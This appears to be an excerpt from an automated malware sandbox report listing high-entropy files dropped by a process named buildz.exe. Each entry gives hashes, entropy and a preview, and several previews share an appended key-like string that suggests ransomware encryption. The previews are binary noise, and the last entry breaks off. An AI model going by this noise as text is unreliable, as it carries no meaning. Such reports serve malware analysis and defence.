                        SHA-512:9FC54BE30588FA7D1EA989FB5D0D9CF4D05FF1DC67F16FA521D574D91B682D35D9DBCF7A3C04D5E0BB79B45C767B21CBE6BFF5140443B7AAFE03131EC61376D9
                        Malicious:false
                        Preview:<?xml...%.m.h^...\>.6..o...~F...b.@&......O..Lz{.s..MwU..+.q..m^qJ.lN.:!.i...A0I...(.<...F...k.Sr...73.n.....D.Gs....6........5.S.%@p........iQ.v[..n!....c!'.^}....|...h....W.........Y..\`...M...lO..(...z.H...Xg......<. .|..z.....I..d.......B.(.nBy....fPl.X.?..|.hH..{........W#.... ..&.n.`[]....X0..I...D..^&.n....6>bE....A..w..-..u.........>.1).....p).4....T n.T?QRm.R.......!(g.8H.v.I9z?.P.]..k..< ...I$.l..k..........+.k...\.-....z....Y#...@.z..M2....nz83L..m.t'o.|....}$VHc...|<....u...G....a..F..]uf....E.Y.d..CmZ.....E...J...,...Y...W...- ]...]......VK.\.....o.n5z]l.....X@..'w$..%v.e..A.=.-......M........\x{?9v.....[..t<...f"..a..GE.!..b.. i2R.=.K|G._x...^.fl!.uo..s......S.Z...\;U..{.|..Q..kq.t../........o.0e...Z.....wzC>..d...6.'.4..T.v..uG...WB.|.rP...Z.m......G.P....t#?.B|Y...=..x:w...'.~.....h[?).{.NQ.. k...S...-.U@.k..^.X...k8k5.s.740......z..........WDf...q...........L9......h(.i>0N';X.pJ...5%.!%ym...S.Y0.....sS}....v..J.
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):2096
                        Entropy (8bit):7.906346751188864
                        Encrypted:false
                        SSDEEP:48:Q56ULqn5UtZKQhZ+K43XG9KVhgSyu6ZD8E/UD:QYKqn5UiIZ+K430KVhLyF9A
                        MD5:1BCED9CBA8B732FB13D5A04ADAF4E626
                        SHA1:FD88F03454CC6A254099B91DCD1EA343CED6CFE2
                        SHA-256:B26F47C63B85A5336656A0187B80DE1CDD7BC5E9D2800913FF186F37509F12C5
                        SHA-512:08304237EAC6D1C0C2F243077D0AF187DE8C987C4E55C36F3E9509D6C5FB9DEEAC5A417A681C06D1A31B87BF6A6274C9483FBD68B602C4276A8C9066D24E00CB
                        Malicious:false
                        Preview:<?xml.?<.(Hgi.B.q..SAB.U=..Q.U.@_M]..Tx..h.D.].z.$O.U.Z ....Q..r.#T....J.^#.@r.m.e.....d.C.O..29W?...r..`$9..*.`........bT.. ..z....{)..^=+..i.9.w._..M.....y.L.3m.n.C..WN.......A..ul>...2E.G..s...*.}....f..Bf...F.{.H..>.4=..../w.........".B.....6...0.....h/.J.?A..?Rq.S.......".....p.BA...l.^@nB..w"....o>..*..*.]k.....SY....].0/;/x..B)....Q.R.R.....+.v...\.)%tJ>n.....b.DA.A.x.q.a.b(.~r.X..;Gi............UYn....e.Je.. .-..!...jp~.L........\.....=6..?...]..0...N.U....i.....g......%.cm$E?W.......H[.<?..Y.X;..\..@5E.....l8.5T.Ie.{....tbg.[-.<...G.y."+o.I7.'.......>..C....z.....Q?X...s..Y.\...cL.$.$...B....c)wk.:.....j]7....C.qw..Y.#..k.{../2...~.j_.2\...1.@p]G..N..?o....R...y.@K.xJ......'..(.S...P...O F.........].a.>..N...U_..5b...n.....(.r.+...dM..D...W,.R..N.........L.>_.BF.N.K>..3/......xQkF0......x...@7.....|.%.M{sS..k.&.*m..".>M.ZE.... ..?..}s.|..S..L......p...7......%m|...x-..Z..)..1..D.z...U.%:....~.D.w...B....)..i.....5(
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):7525
                        Entropy (8bit):7.976896157309538
                        Encrypted:false
                        SSDEEP:192:nZnCj/I1843ziuCSpax55XMGAW5Uz6T+UXJD7B1gRaNfA:1CU843zzQ5JMGAW5E2ZD/VNfA
                        MD5:BCD727514F7B58B245CB26BD5BD1A411
                        SHA1:3A0AD394627E896C40EA31C54CBF0D160AF26DB9
                        SHA-256:64F70FA9A7DE2F14B9845C5A666B67CBA0F89B1E6CF4BED81F781C70B270B1FE
                        SHA-512:C6A62B93D46465B5ACE496369758A24185B337A906751518509E1799923C675EE3EEB1D342C8F0226ACB19CCDDD3A047AF98249E6B8723EEE69CCF6449A7C6B8
                        Malicious:false
                        Preview:<?xmlKa.l..b..H9...*.....;3~.;|...U0o3Jx......+.....Q..=J_.~..<.:,...*h.w....&..p>....Z....#S{}..[.bL.]@.....zUi....Wx.K|..M......e..Ar....'..A[5/.Pf=|.o..ju.y5.\.e.Yp,}..Q...E....7..\..C..a..te0..D.E*]../.%....a!.R..`.Q..=C(1Z~...D.fZ........-.......K].;Rg_]..t.....e...L.-....mk 6..kX_.......1.._..SU..;.....mU.n.z\Mr....*....\.Qh7.^...>S;Q2.....~;.......@.7Lo*B......Ew........ql;.M.Y.R..l..],.4.......>...}1,,.M.pz..S..*.. ..B.O.u...dsh..q/._..\]Z.w0...u..l"X.....:.,hoz....}....rU`c..A......B."....B\..AX...........R.n.....*....D.9........t.7..........F]~..p....0.......A.@M...*....dp...c]...........q...@/.....sb.......<.L....k...;../[.V......di~Q.h..=%......AS..! ....]i..T5....(..w&.,.dN'...6.....=l.8._.p..n&(.5...~........@e./a.l.Z#....D>.{.......mr.2.sBM.Y.../a..&...x).W}:&..!xT6.....q1...6..L.....D..uU....P.$X.~.........{...4..B.........N.-.S...NV. .e....^#s.B....E.`.v6...;j..D.......i..*F;0..P..T.,z..jO..ZP..~@...c3R`*.o
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):4197
                        Entropy (8bit):7.955022248590353
                        Encrypted:false
                        SSDEEP:96:n392eM/j/9waX6Y71J3OoyTBr3u/hQkWjo9sA:3FMeaXROlljC2kqA
                        MD5:037EFC120AA704EBCF1F229381A486EF
                        SHA1:B7C545359A0F7CF4DAD7A90E04AFF40E5F5EE328
                        SHA-256:D9A36DFAFC48C81C8FEED096C9429F9BC6981DF8F37F5E1D320A42AF0F3146D0
                        SHA-512:3CD7D6A71968FBC0DF467F992C3A72F07FC992A07B1C33E60F53B872FDF9ED86075526F3BA76F72E2B82DF893F4E31715B5D2AF9FC097324F10657D3249D4D28
                        Malicious:false
                        Preview:<?xml_...+...+$.Z.?...b7.H.Bt....5t:........`.5.>...u...Z.GT.F...q;-.$.[..>.q.q<.%..p.)....VB.r.$P0n..}...A..)......{.J..X..x.z..Q+.N.....o.2.G.X.[..A.X..K.o.:C...*.b[..H...~v"...........x5.4.m...P.........(au.e....7/*.Z...{....I..(a..uO.yU..+.L&....L.F..#.G./.#.?{...mb.m.K...V...@.CX....r.h.l......,O....J...ve..i.VA..X....~a..R.....$.l.Q.M.n.iL....Z...sY.2H... ..V.u........,....aG...SB..^...d..4*..{.I8.G.....\..\.Z.3d...Mm;...*pgd..R%x.L...J.1....].OK........9..e)..O.xR_q....{..).u.....sN..t..W.X:..5.-.....!..0..U>.5.(..Z.*........x...:.P.*"..<..P.s....2.....~A...h.t......N.]%.~.r.A.h9......p0.F:l.m...m.>...z.p.Dd.@.....v...n....o.td.....X.\!.6..B.;..G...KFV.(6.".....(..._4b............v..p...r..).q.T..|."-...C...oU...a.K...........i.....>A..2..A!.'n.P0..T........B..V.W}f..j.}.YwT:..BE.&.Q......[\.%....G;_...uW..=..R......d...%...a......A..P....._h.^.V..i<.gY...e]..!.......\..=..S......|.x.....E7....Pb.......c.[..(.7<.#h|.c.....
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):4608
                        Entropy (8bit):7.9604011506847225
                        Encrypted:false
                        SSDEEP:96:UuGr24B2CbOinhgxWKvoSmYmNc2Y/DXX+a7C6hUy9pFnnA:U+4B2iVhgUgt1ml+r+a7CKUyXFnA
                        MD5:BC11FEF9C91236C259F544A873C996AF
                        SHA1:B71B5E881BF8320AD13EB7C37F7765740A3E096A
                        SHA-256:19091FF04785A1DAC7D4C4732B086C6D307FA89F3DB0509225BDADD732142F71
                        SHA-512:07748BC738B85C2AD630FEE64BE7E121A432C2B543A867A872EFFC5B9F5927B177FA8E60B87C62EEA1A8A2F8286F25CFCC0D02FC05466D5D038F0E129A15DBE5
                        Malicious:false
                        Preview:<?xml?.x..!.]..D.Z)t...L..S.R.A$.[....M?..y..K..xO..*V..}.@..x.=..dZ.0..kj=....#.B..oW./.P..+J..v.....=K;L....Y_......n..3.G. ..M...{p&.0B.n.....E.W...(......s......`.|.GIr.}$^...>".s......X.so*.9."mw.'K..=\N..]..'.(../q^...,t..5...0c.N...o,.mJ..x..D..c6'...q.....^:d..#.......5.t..i../.l...>m.Mk.....4r.....#..9.S,..C...O.........u....../\.r9........8..y{;.......^._...`p..c........9Q..s.t...C(w.&U/....y...:..Jt....F..G.at.^...C[.B..;....X.......E...-i..'.......G-.|..a..t.......R.u5we...3..e%...vd....u..R?Y+..'.:.....Ocp(BJ...(......t...Dt......]....~.[0...#.,..FW....H=.....?.;.X7.;..*.E.E...#.%....Y.).8.Y;S.I...q..U2.]...5C...A. .5cz#.....H...>.7J..XnQ....bhk..7 ............f}..q.Q./H.7.....;........4.Jf..H..f.c....41....^..>......./z... .......>z.bPz.#.....PP...e10-B..q..n.......!5....@,.@p@.n.....p....L6...E...-n..m....4.J4......W......}......... #.....I.Jg....7.c.FB.)b6...2.X......A.c......[l......%. ..(6.y..s...,....t..`.r..
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):2884
                        Entropy (8bit):7.93345135849568
                        Encrypted:false
                        SSDEEP:48:ZgXFphmH/unFCxvleZhBAkk/iyh2Xo3TvowK81LjWefGoyPIOK5BLuMYd2n82EIA:Z0HmHGnFCVlejBAkk6ASo3TvocRTyPIE
                        MD5:3A8D30B86EE01112F34142449EDB9E52
                        SHA1:BF8602AECFB448282617F67C38610894E2C8FFE5
                        SHA-256:5AE12059023A5F75D73E44788C1A67B095D5F5362D2501BBC6ED86101EA038D0
                        SHA-512:C1AC93A274891E4B548309E20A27192591A08A6D0B1B2F46865912B9967BB65498E2E3FAF55784D15CA5D9391C6194DB1E4EF4DD2729EA6A22556EA7DD74CB29
                        Malicious:false
                        Preview:<?xml.7.(..3.../x.aS.zJI...t.|....d$..pt.=^......h....ds..7....s..#T..\[..(AyzKI...?.7"u.q9t....=.+...v......i..j..7...6.j.X...........z..(.S.H..\A..)...O...m...(......{7.....<......\...)........s.d;m.o<..4.fdK R..@.......m(...A..K.....b9MX.O.......=V.h....4+....Z.x.7.?..:=...L.c.cN....enK.Q..a...:..D..[......>.{.G.}..n...?>.Y..j,.....+4_...........v...P...}.Yve...,?..\.T.;..;.0rx.Ez.%3.D..}aLc.89..".......t.....t.\/]Q.PBj.M.......T.~.......n.h...!...R.r..........#.H"...`N#`....I...p6r....;_..+."...(.W...ag......6..=_...@..9p..]. .......P=.~L).X..w...i.}.."h+....I.9.)..zE#..o....4../..j...E.mx,+.|.G..i...k)D..td.{.I}g....q.Y.GX.}.....^%"...kkc+N*.$.,$.@.A.v.......?.Ap....Q....f.edn..|M,.G..yb..)....$7:.mv..H.T....S.a.P.K...;.....'@.,./q...8b....>.e...r.<8h....2..J.......IGw`7.q.'...J....+>."....<..q)b6f..^.....q....L....V...y...R*.[r?,v....X...9...5....T.fV...s.....FC.W.X..9.>.;}]X8j.&i...a.{.%.. ..#dXrHh......'R.#.$..H..-6..8..L._.(
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):5842
                        Entropy (8bit):7.96481200531583
                        Encrypted:false
                        SSDEEP:96:Ky4+17jpeHcNpMFr/y5ghHWaNsmxCw6KuKOHD9fVu067UYQVqHmdT+RC/LO5XA:vBUcNp+yKHffxN6BfVu06AqmJL+XA
                        MD5:9155646D8AB0D8555C3B1DF9492F0EEB
                        SHA1:DF7AFFDE5D358EEEF8A3A679720523202F8D935C
                        SHA-256:CF394DBA84BAB269365E019E05006E643D979EE27BDEA6ED2C2C1A7AA7D46116
                        SHA-512:47829BCB3A2BF35CDBA7DEED498D5F224E95421975A2EEC80969E1BEE28807028B7C518313B3A742B9E4FDD9732B764DFB1136E2B91F53F9E66F55EA12ECE417
                        Malicious:false
                        Preview:<?xml.>\p..G...qe.mq..I$N.F.. j..*P.ree./.!c=.OE.`..F.\..(+./.Y5........8.c.D.".'q..A...V^.).z.d......h ...1\Z.;.,.....*._av).R.2xd.QM".....J....<.4....x.$....t.y...dS....S..2.........*.....{.v..n..+c.._........g_.s....=.1.."m.~..T.E.0.C8..&.$..f.4..MB.v...w.K.1u...O./r.......9....b.....1'$...~.M&p2a..[a.=..7.=.....l...)=... ..T..J...H....w)..."...1....0.-6.S...,......5...hp................G%.xe|]2G.d|]..v....x."....@=\.,.m...)s.>...n...K..g...c!.3qI...fd........H&..O.*)n..R}.......O4......q.\.B.n.1jD....x13..e..3...Z.J..g^i..W>JN6?...%.N8.....l`...wT..[..(-j].-.2g.+.`.c...e...>....P"..1.,.5ex.<....."....&o....F...V.L.........`..{P..x.....fu=.CS...4.6w)o]?U1...Q...;.9^.....d..C..__..3...b..........y.(...$xw.6../.1d.`..9.._..c..."..2.......T.,.<_.u?<..].{..*\......s..!.k.yb...a....sZt.'..n~..$...y..e.O...g&.G[Ty.&5..\...".....Z...y.[@.o..~.]...p...Y...P..r.....jF.$../...G...@..... .}f ...P8......R.l..m.UF..h...r..I.rO/8.`...$...;..25........
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):2023
                        Entropy (8bit):7.900883574096406
                        Encrypted:false
                        SSDEEP:48:cCdKHl93n9m0GZCqhwG5F77ebUxRQfWwh96EtI6UD:529m0GZCyLF79RWxT6L6A
                        MD5:8B54E3364D2D9E5BE3BCA2464C9F7749
                        SHA1:9D31773C42E53B047772751970ACD0CDCD92052C
                        SHA-256:4B2648631F9953D1BFD23DEB5832D5EA411CB4773428D466692A5A8F5C1F26B5
                        SHA-512:032DCA8D92A607EA938730A7F2580D2FA79F71A481B7B9628F68AA45ED9E20A8A12F92E6B8F8C4EBBA4321C2849A720405F3C0D854106F3C0ED2BF39FA0B0DDF
                        Malicious:false
                        Preview:<?xmlr$iYJ.a-..S9.vZ.....@....:..}.1."......._..H..H..:}..4.o..P.g...)..MV.l....V..w.....+.d....D...[.C...K.w.@...h!..2.e.gmn.av.....FH....-.]..T.p(.0..^.6*.7..5.1..:..J..O2J....[.^*.~.F/?:....A...M..LLeg.f.#)-W.......:Ex.v.....*..b6#..O._.s{E..`..B...J...-...*........D.u.k.....h..mo.....E..B.J...}.l..". .Bm._Z...J._@7..$z..G..2.w..3.DA..`.x......>o....Y.8. XD.P.......P`.Hv;..b.B....y.GBKs..|.W....}..T...p:...7~T.I...........b.`.@V....ut.r.}HG........(b\D...3...k.......]:...f..)....=...X..>W..<N...]........#....Z..k.i.kr.(.q:].?v_iy...s.fH.n6.2.Z.V9t.A".|`.."_&.6+@5....?..........6^.........'.$lf.....8.._l!.[EE.J.Q.*...|......d.W#.V._f..C.>.;...{.h..\...9.Y.....c.S$.u.w.....k..'......@..o..(sC.g.....9h9...{M`..@.`(.RC.=..|t....b.....pB....R.8....< S..Q-.-^{j.B.q.$.H..L..`..a>..Z0.<.]..Z.4.5)]....!..:.N....7B...>Np....E.)d.'..h^... .H./...`.../.S...L.S..]....,..+...c.......b.y..2R...".u0.R7.Y...p.k.Zef6}..=...L...).Z$.FI.j.j..A....
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1001
                        Entropy (8bit):7.798651076501038
                        Encrypted:false
                        SSDEEP:24:zjXCwm0MNjiezRjr/H7w77bDW0BHOqJJB177bonGbD:zjHtMl9/M77bJJJUnUD
                        MD5:9CCF8DA77D8F782B8E8505507AFFAF56
                        SHA1:5CAB481415BA996302E767A203B1658A131062CE
                        SHA-256:C8F6DCDEB0C87933F64BE4174CD4873AD4252E7425ABA821B884F6A16C4F4D78
                        SHA-512:63B3475ABAD7D4F95614AF4227CB8BA4B235A9508079F03585B8993B365D60D35234C9CFB7C65F4F0EA9D1DF71AE7AA06DEE0764942B145D4B744CCF04CC4EE3
                        Malicious:false
                        Preview:<?xml.....bnQx\?....{a..D."5/S[...Xs[..1G....r..l>.&.qZ..V........,_......@=.83e.A.|...O....t.,.vM...h......).....?..D.8.H.n.p....f.L..vs.`....[,....4?v}.e..h~X..T.......|-.....+9.F.ZT..C..c....X..$.......e..+..P..r......L.....H.2.........1.;.v.C/...$.wZ......3.z..8..@....(..s..MOm......S{F.J..a....*k....{..f...>y-{.%.q....+...F.&.ec._.>.e.E.<.R...cj.m..x.......]^j.......@.c."...sG...x...e2.1......$...........F.T....r /.l..(SY.... a.-.....G..........L....1...*=,.v....w..2.....6p......^Ey.wf.&i.9.Co..mR+..i.ih..j...3.....B.vZ...N_.k..A<..c..b%...@..].v....../......M](:y...N2H.~/R.i...V.z...n.([7.).....wR..G.k.%+H`.$4Qt...f.b.....:.r?.7].s(3..7...E.(8....bC|W!H..^M.........(....%.8.i..r.Q......(o.W..|K.f~.Sn.)...!........!.....}.......x........_.......0.....c.cbV..%.<U[...C..K+......R.P.6....L.a.]......y..m....J...Y...Q.8.w.|L..O.(..B.&!.7...}...EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):2743
                        Entropy (8bit):7.939839807688481
                        Encrypted:false
                        SSDEEP:48:ENwQsKEOqkZ0MzE25pAAq/lsFopeadbUIQuSwkXUJ7zSKtB/e4zCrQUD:jVBOqkZ0Mp5aphQhuj36QA
                        MD5:0E354D9472121162E025C970B1CB8355
                        SHA1:1DFB3E3E2693897FD4360E6D30954BBB1C8E2987
                        SHA-256:CB684973B38D7F716628A62CD6ADC27480D6DC96571512D8FD9D7D7F2A5A0A81
                        SHA-512:9EB2E2FB7A048DEE8172016E32C4FCDCDF7201ADB62CAD5DE3CAC33895621023181E03792B80804EFA4C5C6AFA3D754D04BFBB1BE24A635A6BB552A32F3BB79B
                        Malicious:false
                        Preview:<?xml.n~...28!.u}..8.O."j...dv.........Re....~S......W.ZJ-'[...HD... .2..F.Hx...c....#Mm.jb.N*1..<.6n.p.\.%..b.<.qo.....l#f.....Z..........+.6q...i..?....|.}..F.0.dvk.Dm...r.L....bf....2...v.Q_..p....uWy?.......(O..w.<..e. .P.....PL8....~../..L....%......1r'd..'. _..pJnB.x..r...Xi.}!%]... .F.S."..W{.F.[T0...R...v.p.!M..~..3...U.WF...d...u......I.....J.....,.^..C......C..[u.(........Y..q.v...)1}.......3@Z[..b......$Q.(P...R.JH\.....J..x%;.n 8.XZ..".c...^u.xr}..x.>..$...Ge.S...uTp.t.A[..C...Y.....-.Q..."."...Lw.G.........m..N>g.4M.K.....F..$.#..,..D.c.....SK.Mp.({...l}.%.....l@..F..8.b(h...?fC2..;_a.s.......]..0-...%_.=...-.."?Xd.u.C;.4.;8..j.Q..t..........f...1..........A....&$....!.V..[...........W..jy..3.....~...l.Qa.|.U.~.PZC\../:...$.....E..3..g.A..!\.c ~{......y.....{...."I.:<.B.$.....N.>.R....c.5.......Lz#e~.........?.1.._..{..\...H...".Z.f... #..%...aa.D.!..f.scz'.z6..'M0....[..;........&..Hd...(....\._.$W.J.2..._..>......^
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):11063
                        Entropy (8bit):7.983853889604435
                        Encrypted:false
                        SSDEEP:192:/7rITfd4xv9UeyonmOkL78BnMNHeUdOwIgqIvlI+odqdoIWbv3Ki8CPqyUfzEA:/7rvxvmgmTFDFo5IWbvVCRzEA
                        MD5:CE54F2D1D78DADEE96B62931D5F788C7
                        SHA1:BD1FEEC6132BC99B33EC43B200A92AF6DB0AA260
                        SHA-256:3282889DD18A51658A7FB45A30237B7B8BEBEBF563E471C3F33765F139211821
                        SHA-512:6FC9781A2CBBD83941C9A0E7E938AD65650FC334A8129CE3D725FEE8AE19E45B5B4E3830C79A82EDA5BFAE51CF32C6336180C8FBC44232D831B9111BB8CC6E19
                        Malicious:false
                        Preview:<?xmlx..".DJ......G...m.9...{...V.U....cc...5.pk5......|.h..E.g.W@...).....b....Yb...7....{..N......m.m....c...0...8f.5..uf..@..G../.........Z=.e?p..U-HQ.}o.:..H>....'...~......s...j..k6..W...~.7u.....Z..bG..l.....N.8.F..AV....G....K.Q.'....[.7`...o...........^...;h&.BLa.G..[........e.J.#H.\h.gF..F{.;....5:..~[T........?S...[...a$i!.R.....h..V....[..?.6.ZF.....BB.m.n.............B...hE......x#..T..P,+A..P*.l.T.q.IC.F.....G@..Zp..D'.D*.._....4.....Kv.;..6..,.\) ....BnX'r....'3...5F..$!.......b..T..-.>.1a..TA....8-m.....6>0..C.....^.].X....E..D..i..).....9:.....s.Be.%.d..x...'.$.z..p.....F.Z.......e0o@}.......f.F....l...&c...=2.0..6Tb.:.S.....#&.....xP....4d...*l...Z,.:qC.Z..X+..........C.....tF'......%%M.3M].w.7.....?9A^..]=.w...Kw........M~.ms....ZQ...V.i.a...>.....=.f/A.N..&}..M...Ws.6C...P.743Qq`..).&.U.K!#..u6+.....\.I.]'.....M.7.iGb@M.......5@(..E.y....J5..r....U.-.2l..l..._B...W...T_.C..{.^K.%a+...I..Yk..3U...xn.%...
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):807
                        Entropy (8bit):7.706743171045733
                        Encrypted:false
                        SSDEEP:24:xOLjQZa+K2RuVWYPmhgTgwtv+8L5Ns2TdVdp7GbD:x3o+K2/YPuQgWaeDdp7UD
                        MD5:31F0B1B7FC6414BECF00BB7904E6F747
                        SHA1:CF9C94FEB28F01FF11C263FCDC034BBCDBA25C51
                        SHA-256:AC2508A1C0ACACEF4368C276F4273A0203B7B99934E10C422DF031E5D993EEED
                        SHA-512:589274E737D8BD456539FC44FAD0F9C7FE2E112C2668E698637BD62410C408D645C5D39EF6ED7B7759B2387D48AFA17AC7EE5B0D43CD0076EE5F0D60560BCDDB
                        Malicious:false
                        Preview:<?xml.3O...n..V6;......b..`.l1,.......Dg+...6...O..IP.......%}.|^....{N.v.vP"?...[j...Tu..G[._k,...-.>....~...A. ./*.S,\.......x....f2..1..!6...b.q.G...m|.s..G..m.q..x..... ...p......l..p.D .I..~.Z.=..J............3...N.@n].F....o.....&8. Z.F..l.$YV".P..I..u..G6.H.i...<.h...)i..J...... ..B2...._..e|...,.KE^....p..YOuSz...a..%S.......l}....}h..8........!... e.8.....;6...W...Ge.h.2gk.....Cw..Lh....1.......f...s.Ym..J.$!.n:.4..l&..\d.1.y.*t..T/-..6RV...6B#.G....HO.i!.....K.7#........;.3....w'.jX.>..;.....{..4..C.F.1. .x.;..v...7j....*O..7 ..=t..0......W.....3..V+..|.?.}X..N...YZ..$^.M.f.......2...._L]...I^..|Kk..p..~....x.....?.Z.D?.)%L.....o&".. ....2.-`.Zx..P....GL.3...4...N..;r\;.EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):747
                        Entropy (8bit):7.727981852943695
                        Encrypted:false
                        SSDEEP:12:8nxUw47erD/SBSETMCw02KjoDzVGsI+mYDywTR0nD42piOiFQQaCgjLSSev120zI:CJ3rLSBSETJMDPRDXRgztiSQNgjLVetE
                        MD5:A70E7146EA298911D859288AD87DD658
                        SHA1:E3637EE7E21A889F01190D197C58C1805F42963E
                        SHA-256:19B84AC448EC8532C431E97E6FDCF28FCE5FC49E81268B3F505C6503779B3BA1
                        SHA-512:3260A3477A94525B82061E0FDFBDA27C0AD41E590DB4BF14D2C231E7E47C086D5BBA148AAC52CDCB5C2EF4A789605F1A890A0795015368C963080634279B4EA4
                        Malicious:false
                        Preview:<?xmlv'...V.aO^.$(^.Y.....c...Z.*.>i=q.Se2.$.|YL....a...!....^6...f.>....'..u.2...#.1O4.p.n......+~...K.5.^w..|Q8.}`M..>.8.G.)Zx.t'...U.........P.....:-.@.(q.........W..o.8...B.N/.......z.j......{..p1..d..&#$)LWp.........q..6"...L.E......../y.T.....W.=.......|.C\.#.|...K.....f.d....q......m......o.W.rV..\......%..EK%......NV.....`Zda.hi.w.J...+YM\...q....<.E.h.._.M........-......P..I>x^.Q.&. ....[........~..R@...b.w..#>.Q9=...,k..Y.u)v..&9..G.].Y.....q.\..nm.B..e...9..?.dG.l..r...1....y.t..V......x......e..<'P.X..c.e...u..i.....#...}cW...F.p.N.`.`..1g.....}...=.....`C...?>13....\q.G2C.=M...'_.+.Qc...(p...V'v....)tJH.S]=..Wmp.EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1786
                        Entropy (8bit):7.887214175334779
                        Encrypted:false
                        SSDEEP:48:5mziAIOXVPkbpBjFv/msTXr9OggvPFpRBH+j2UD:P8VPkbjjFvJDrfgvPFpR1+j2A
                        MD5:911D7CDE234298A52612E02ED4ECB938
                        SHA1:63648A6902490C62B8F78ADD95D8AC73661C473F
                        SHA-256:09B452E9DEA9458AECEEA67931EBA69853CB83EB4C9E5190AE8C034D1FD983BD
                        SHA-512:9AF08A95AB4A0C1D6090D3C8470660D3689F049E25E79ECCE7F5A085068B07FD2E266B10B363DCD08D7B074750136E9347583D8F998FA6B959F426F44FC86227
                        Malicious:false
                        Preview:<?xmlc..5.r.n[.....9.y..B*...Hh.....jO9..*n......@0..@..<.f.$.< U...92.w,'.....>R-.m.-SE..M...,..XWD.'v.'.!.-...%....N.v.0.7{.7...~pHV.\JZ:..c..b....x!J.g ...8...e...obh.t.J..N...v.R...&.t.S&......F.~......s.)..vr..c.j.g...5.RKF.#}..'w.C|..v..s.J.....d.> ..m.....<..ov?.R......Y..U...Dq5...W..Y..Tcy.s1..`.g...b.<.h.EIl.Y.D/...e.cT....3.7....x.Ar.:.;...:..n.&.=:+...WjowZ.4x..C<.W..>I..j...06.u81....i:Z.[..=|..J3..OcR.z.I#.c.A.p.L.NF.z...6.....5..P.J.....n/....).).s....y.peZ...l...g.^...e.s.....?.1.D-..U..b_^...5....k...'......$<...P._.x...3G.w=.s.7...l..W,tH.....!............v...+m.=..I..n..O..<?._!..w....fC<`.L....&m..l.*.[.R...}D....hTjP,..P.UN.....W.... .F$.....x...k...JgH.~.|..ze..`k*&..<oa.;..I.%94..%ga... . l*.....).!....vs.Hk....n2Bzw.L.rI$}..]4...o.c".=...UvI.n..AtF..{.}2...=K._.F..^.......pAq\.......?.3.....-.W........M......$N...C......,.]...iMdz.}:..i.'.v?.3oh.....S.....>/bC%..M....4...P.m...v1n..wA....W......-.........fk.....X...
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):886
                        Entropy (8bit):7.7459456440372225
                        Encrypted:false
                        SSDEEP:12:T77eZwaxuOO6/Pl8aDlNuWOg8z7r/TE0AhF2vYwkkH3GgKtBcMb1LxEh2AHJIon5:T7pY1cWL+zTEJF2gsX2UJtnH+dDHGbD
                        MD5:6196465E5B0B60235F08FD9675CA8988
                        SHA1:CFBD45B34ED6497E98C3D2E158E2D3EF94592C4A
                        SHA-256:9C572C07B6F3E352EA7E07E13FE1EA25B1F81E462A21FBB83AB0AEDEBA7D62C8
                        SHA-512:35A6B72623515550DB23D547956251F90AC3E4D40C6F62D1B3412D55D74C46478A62DAE772E05475FCDB25707CF57B9232A16ADDCC32A7F1EECFD42F5EB69829
                        Malicious:false
                        Preview:<?xml.g..k.c.^,qGb.i!..\z<...=.....0.>/.N........Ts.....V...W#..q.-....QR...A..y.u42._%...P>...H..r.n}..ZzzM..6..M....~.....}..5.O.ajn."Jwa..e..E.E.+..B..i....\B....%6"P.sD..@.......OI....T.)4...ehn.n..C...X.m8X.X...p^..O.m..{(...V..z....Y1......I..'.n....Iw<..!i....>..$&1.......^..._..e...4...t..}R..D..g.st...7|Y.l...J....G.n.u.h.P...i........](WP...0..L.!W........u.@.(...P...0jC...v-..Uc.Z..\..0.[b.k............bHV.TV"..,..'....b.se......-...-..R....;D.RX.%....`f... .A..|Z.}"..^.qpJ.E..G^...R.'x.,.T.[Fz..@...-...j+.P..t...... .L:/e....P.....$..A...3..`.O.0aBt.....wB..w....e...0........>...).k.To.sB4m@..gs:..r..`....6e....Q.&a...(...,..6..$&UWJpY.S.I..nH........G....C..V...n.Hs[W..Po$.."...]J..&.5(..$..3./.6a$..[.~...@.....WT(....0@^..si.. ...%.[w .-R.EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1324
                        Entropy (8bit):7.833165055486836
                        Encrypted:false
                        SSDEEP:24:ahUfxFFgLJYzE1+wpQwEjbslbJdTplpHHNB3mM1R4xml/BRN4q7RGbD:lfxFGFYDwpe2llpnv9gxmnXVUD
                        MD5:617AFBE7A534B97CBEC195B9C31CE975
                        SHA1:0BB931B43F516662DAAA5A04C7BF3FD52CB33067
                        SHA-256:6437437620C39F66A499E28B983550AB53152BB02E7021801E5FC2E9CD2C0717
